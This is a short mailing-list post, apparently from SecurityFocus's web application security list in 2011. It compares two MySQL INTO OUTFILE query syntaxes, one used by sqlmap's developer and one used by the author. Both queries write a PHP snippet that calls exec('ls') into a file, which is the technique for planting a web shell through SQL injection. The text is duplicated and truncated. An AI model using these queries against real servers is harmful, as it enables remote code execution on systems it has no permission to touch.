Web Application Security
Back to list
Name:
Email:
*Note: Email address will appear as "user domain ext" to prevent harvesting.
Subject:
Message:
different ways to use INTO OUTFILE in MySQL
Nov 25 2011 05:08PM
Robin Wood (robin digininja org)
Hi
I've been talking to Miroslav (sqlmap developer) about the way he
creates files using INTO OUTFILE. He uses the following syntax:
select "" INTO OUTFILE "/tmp/x" LINES TERMINATED BY "<?php exec('ls');?>";
But I've always used:
select "<?php exec('ls');?>" INTO OUTFILE "/tmp/y";
Both end up wi...
[ more ]
Privacy Statement
Copyright 2010, SecurityFocus
I've been talking to Miroslav (sqlmap developer) about the way he
creates files using INTO OUTFILE. He uses the following syntax:
select "" INTO OUTFILE "/tmp/x" LINES TERMINATED BY "<?php exec('ls');?>";
But I've always used:
select "<?php exec('ls');?>" INTO OUTFILE "/tmp/y";
Both end up wi...
[ more ]